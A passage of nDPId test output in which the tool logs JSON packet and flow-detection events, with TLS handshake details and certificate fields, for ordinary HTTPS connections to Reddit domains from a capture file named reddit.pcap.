{"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
